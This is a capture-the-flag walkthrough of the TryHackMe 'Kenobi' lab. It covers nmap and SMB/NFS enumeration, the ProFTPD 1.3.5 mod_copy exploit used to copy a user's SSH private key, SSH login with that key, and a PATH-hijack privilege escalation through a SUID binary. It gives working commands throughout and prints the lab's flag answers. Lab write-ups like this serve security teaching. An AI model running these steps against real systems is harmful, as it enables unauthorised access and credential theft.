Kenobi THM

performed by: jb-willams

Deploy the vulnerable machine

Scan the machine with nmap, how many ports are open?

  • Deploy the Machine and scan it with nmap
nmap -v -p- -sV -sC -T4 -oA nmap/initial 10.10.223.56 && grep -i "open" nmap/initial.nmap | cut -d' ' -f 1 | cut -d'/' -f1 | tee nmap/ports.txt | wc -l

notice, you may get some false positives that will have unknown service, ignore them

  • Answer: Number of ports open: 7

Enumerating Samba for shares

Using the nmap command above, how many shares have been found?

  • Using the previous nmap command I found: They ask you to notice the SMB service running and mention that it would be a good idea to enumerate these shares with nmap scripts.
  • SMB uses ports 445 139 (usually)
  • You can enumerate SMB with this nmap command using these scripts
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.223.56
  • Answer: 3

Once you’re connected, list the files on the share. What is the file can you see?

  • The scripts show an anonymous share.
  • Attempt to login to the share with blank password.
smbclient //10.10.223.56/anonymous
  • To list the files run the ls cmd.
  • While logged in you can download that file running:
get log.txt
  • Or you can download recurisvely while not logged in with:
smbget -R smb://10.10.223.56/anonymous
  • Answer: log.txt

What port is FTP runningon?

  • Reading the log.txt file the FTP service is running on:
  • Answer: 21

What mount can we see?

  • Going back to our nmap scan for open ports we can see that there is RPC running on port 111(in this case) and we can enumerate that service more with nmap.
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.223.56
  • Answer: /var

Gain initial access with ProFtpd

What is the version?

  • With netcat you can do a quick connect to find the version of ProFTPD running.
nc 10.10.223.56 21
  • Answer: 1.3.5

How many exploits are there for the ProFTPD running?

  • You can easily check for basice vulnerabilities with searchsploit.
searchsploit proftpd 1.3.5
  • Answer: 4

What is Kenobi’s user flag (/home/kenobi/user.txt)?

  • We see from searchsploit there is a mod_copy vulnerability ins ProFTPD.
  • And from log.txt we know there is an ssh key created for the kenobi user.
  • So, lets try to copy kenobi’s ssh key to the mountable directory.
nc 10.10.223.56 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.223.56]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
^C
  • Earlier, with the scan on port 111, we saw that there is a mount point at /var and we just moved the ssh key to that directory tree.
  • Lets mount the /var dir to our machine
mkdir /mnt/kenobiNFS
mount 10.10.223.56:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS
  • And now we can traverse to /mnt/kenobiNFS and/or just copy it, and get kenobi’s private key to login as that user.
cp /mnt/kenobiNFS/tmp/id_rsa .
sudo chmod 600 id_rsa
ssh -i id_rsa kenobi@10.10.223.56
  • Answer: d0b0f3f53b6caa532a83915e19224899

Privilege Escalation with Path Variable Manipulation

What file looks particularly out of the ordinary?

  • They let you know some info about SUID’s and that they can be used to escalate priveleges.
  • Using their command try to find the file that looks out of the ordinary. (I have used my own machine as reference several times)
find / -perm -u=s -type f 2>/dev/null
  • Answer: /usr/bin/menu

Run the binary, how many options appear?

  • Answer: 3

What is the root flag (/root/root.txt)?

  • Looking at the binary ls -la /usr/bin/menu shows that it is owned by root and could run with root priveleges.

  • Running strings /usr/bin/menu shows that the commands are not being ran using the absolute path, so we may be able to exploit this.

  • We are going copy /bin/bash to /tmp/curl then modify the $PATH to read our binary first.

echo /bin/bash > /tmp/curl
chmod 777 /tmp/curl
export PATH=/tmp:$PATH
  • Then run /usr/bin/menu again and chose option 1 that uses curl and it will place you in a priveleged bash shell.

  • Answer: 177b3cd8562289f37382721c28381f02

written and performed by jb-williams - github